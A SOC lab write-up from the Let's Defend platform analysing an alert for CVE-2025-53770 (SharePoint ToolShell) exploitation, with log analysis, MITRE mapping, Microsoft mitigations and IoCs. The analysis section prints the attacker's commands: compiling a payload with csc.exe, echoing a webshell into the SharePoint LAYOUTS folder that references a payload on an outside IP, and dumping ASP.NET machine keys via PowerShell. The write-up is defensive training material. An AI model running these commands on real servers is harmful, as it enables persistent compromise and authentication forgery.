来源

关联漏洞

描述

An activity  to train analysis skills and reporting

介绍

# SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

This is an investigation conducted on the Let's Defend platform, based on a recent SharePoint CVE. Let's take a look.

<img width="1441" height="633" alt="Immagine 2025-07-27 162109" src="https://github.com/user-attachments/assets/e4ccbb6d-42bc-4b5e-9af9-25944277cb65" />

1. Examine the rule name. Rule names are usually created specifically for the attack to be detected. By examining the rule name, you can understand which attack you are facing.

SOC342 rule detected an unauthenticated POST request targeting the vulnerable ToolPane.aspx page, featuring:

a large payload (Content-Length: 7699)

a suspicious referer (SignOut.aspx) likely used to obfuscate the origin

behavior consistent with exploitation of the ToolShell vulnerability

2. Detect between which two devices the traffic is occurring. 

An external user (IP: 107.191.58.76) sent a crafted request to an internal SharePoint server(172.16.20.17).

Analyze the log of our endpoint

<img width="971" height="478" alt="2" src="https://github.com/user-attachments/assets/7864bf21-da4e-4ac9-b73d-eab8d5cb9b73" />

A w3wp.exe process executing a encoded PowerShell command may indicate a potential exploit or post-exploitation activity (e.g., execution of a hidden payload).

In a SharePoint environment, it is important to verify whether this behavior is expected or if it represents abuse.

The command has been obfuscated using base64 

<img width="727" height="426" alt="Immagine 2025-07-27 163800" src="https://github.com/user-attachments/assets/b8a394ac-bea3-4fc9-bd71-34ac501aeff5" />

This payload allow the attacker to extracts and prints critical ASP.NET configuration keys from the machine it runs on. 

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Compiles an executable from C# source code on the server.

Creates a web backdoor (malicious ASPX file) in the SharePoint path, which, when visited, allows an external payload to be executed or downloaded.

cmd.exe /c echo <WebShell> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

This command creates a file named spinstall0.aspx in the SharePoint LAYOUTS folder and writes the content <WebShell> into it (here <WebShell> is a placeholder representing the code of a webshell)

This is the hash of spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Let's take a look on virustotal. 

<img width="1662" height="802" alt="Immagine 2025-07-27 164912" src="https://github.com/user-attachments/assets/8d5c732c-abe5-45a7-baff-200f3d77485f" />



"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

This command allow the attacker to accessing MachineKeySection's application config can expose sensitive cryptographic keys like the validation key and decryption key.

These keys are critical for ASP.NET security, protecting things like authentication cookies and ViewState.

Exposing or retrieving these keys can enable attackers to forge authentication tokens, decrypt protected data, or perform other attacks against the web application.


MITRE ATT&CK

<img width="723" height="247" alt="mitre" src="https://github.com/user-attachments/assets/61fe2244-9ec5-4dce-a97a-7462b5d9d1ad" />

Analyst note:

The alert was generated due to unusual PowerShell activity observed on a SharePoint server, later determined to be an exploitation attempt targeting CVE-2025-53770. The attacker initially dropped and compiled a custom C# executable (payload.exe) using the C# compiler (csc.exe), then created a malicious ASPX webshell (spinstall0.aspx) within a web-accessible SharePoint directory. Subsequently, a PowerShell command was run to retrieve sensitive cryptographic machine keys from the server’s configuration via .NET reflection. This sequence of actions suggests a multi-phase attack designed to maintain persistent control and possibly forge authentication tokens. The webshell was verified as malicious with a VirusTotal detection ratio of 39/62. The incident is confirmed as a true positive, and further containment and remediation measures are advised.

<img width="1252" height="342" alt="Immagine 2025-07-27 170751" src="https://github.com/user-attachments/assets/c9cda5a1-fb1d-48e9-974e-981db4c6d5dd" />

CVE-2025-53770 Detail 

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.

<img width="1162" height="175" alt="Immagine 2025-07-27 171020" src="https://github.com/user-attachments/assets/c4872343-17c5-4beb-987f-237efabd9f57" />

Mitigation suggested by Microsoft:
To mitigate potential attacks customers should:

1. Use supported versions of on-premises SharePoint Server

2. Apply the latest security updates linked above.

3. Deploy Microsoft Defender for Endpoint protection, or equivalent threat solutions

4. Ensure the Antimalware Scan Interface (AMSI) is turned on and configured correctly, with an appropriate antivirus solution such as Defender Antivirus

5. Rotate SharePoint Server ASP.NET machine keys

IoC

Spinstall0.aspx	Web shell used by threat actors   

Actors have also modified the file name in a variety of ways – such as spinstall.aspx, spinstall1.aspx, spinstall2.aspx

This report is based on an activity conducted on the Let’s Defend platform. All findings and materials presented are for educational purposes only. All rights and ownership belong to Let’s Defend.

文件快照

 [4.0K]  /data/pocs/38895f8c6c30bb92e070b07a36adcc1cdfbda546
└── [6.2K]  README.md

0 directories, 1 file

备注